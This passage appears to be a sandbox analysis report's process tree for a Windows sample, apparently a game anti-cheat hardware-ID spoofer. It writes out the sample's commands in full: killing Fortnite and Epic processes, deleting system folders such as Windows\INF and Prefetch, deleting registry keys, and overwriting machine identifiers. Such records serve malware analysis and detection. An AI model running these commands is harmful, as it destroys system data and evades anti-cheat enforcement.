        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4216 /prefetch:8
        5⤵
        
        PID:6060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
        5⤵
        
        PID:5940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
        5⤵
        
        PID:6056
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
        5⤵
        
        PID:1908
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
        5⤵
        
        PID:5916
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
        5⤵
        
        PID:5360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1844 /prefetch:1
        5⤵
        
        PID:544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:4420
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    - Drops file in Windows directory
    PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5016
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4860
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
    3⤵
    PID:684
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1632
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:4880
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:3324
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:280
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:4268
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /s /f /a:h /a:a /d C:\MSOCache\{71230000_00E2-0000-1000-00000000}\Setup.dat
    3⤵
    PID:3324
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:4692
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:4636
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:1632
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:2276
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:864
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d 24218191111067953948909355617590228301982316282316025006 /f
      4⤵
      PID:1380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:428
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      Modifies registry key
      PID:1128
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5140
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 24224784013639207532953811410238141697620078221002286425094 /f
      4⤵
      PID:5336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5316
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-24224 /f
      4⤵
      Modifies registry key
      PID:5396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5600
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-24224 /f
      4⤵
      Modifies registry key
      PID:5712
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:5716
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:5816
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 24224-7840-13639-20753 /f
      4⤵
      PID:5924
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:5972
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {%random%-%random} /f
    3⤵
    PID:6012
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {24228-%random} /f
      4⤵
      Modifies registry key
      PID:6124
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d %random%%random%%random% /f
    3⤵
    PID:3992
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d 242281858831503 /f
      4⤵
      PID:5328
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:5472
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random% /f
    3⤵
    PID:4884
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 24228 /f
      4⤵
      PID:4532
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:5584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:5636
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 24228 /f
      4⤵
      PID:5932
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:5512
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5956
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d %random%%random%%random% /f
    3⤵
    PID:5172
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d 242281858831503 /f
      4⤵
      Enumerates system info in registry
      PID:6096
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:4488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:6124
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {24228-18588-3150312048} /f
      4⤵
      PID:5384
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:1904
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {24231-29336-165993343} /f
      4⤵
      PID:5472
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:5648
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:4884
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {24231-29336-165993343} /f
      4⤵
      PID:5656
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5872
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5804
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 24231-29336-165993343 /f
      4⤵
      Modifies registry key
      PID:5796
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:5968
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5972
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 24231-29336-165993343 /f
      4⤵
      PID:6124
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:5256
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5404
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d 24234-7317-169627407 /f
      4⤵
      PID:3640
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:5348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5608
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 24234-7317-169627407 /f
      4⤵
      Modifies registry key
      PID:5892
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:5336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5724
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 24234-7317-169627407 /f
      4⤵
      Modifies registry key
      PID:5228
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5896
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5124
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 24234-7317-169627407 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:5276
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5604
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5596
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 24234-7317-169627407 /f
      4⤵
      Enumerates system info in registry
      PID:5840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5872
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:6032
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {24237-18065-1956018702} /f
      4⤵
      PID:5844
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5212
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:3200
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4416
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {24237-18065-1956018702} /f
      4⤵
      Modifies registry key
      PID:5284
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:804
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-24237 /f
      4⤵
      PID:5652
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:5264
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 24237 /f
      4⤵
      PID:2360
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5864
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5484
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5312
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:5276
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 24237 /f
      4⤵
      Modifies registry key
      PID:5348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:5884
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5952
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-24241 /f
      4⤵
      PID:5800
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:5796
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:6104
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {24241-28814-4656-999715575} /f
      4⤵
      PID:1908
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:6116
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5284
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {24241-28814-4656-999715575} /f
      4⤵
      PID:5568
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h /a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:5432
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4992
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:5624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 24241 /f
      4⤵
      Modifies registry key
      PID:5052
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:5920
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:5916
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 24241 /f
      4⤵
      PID:1000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5900
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:5504
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 24241 /f
      4⤵
      PID:5260
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:5628
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:5824
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 24244-6794-22520-1293 /f
      4⤵
      PID:5124
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:5920
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:5560
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 24244-6794-22520-1293 /f
      4⤵
      PID:5712
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:5992
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:3640
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 24244-6794-22520-1293 /f
      4⤵
      PID:5696
- - C:\Windows\System32\cmd.exe
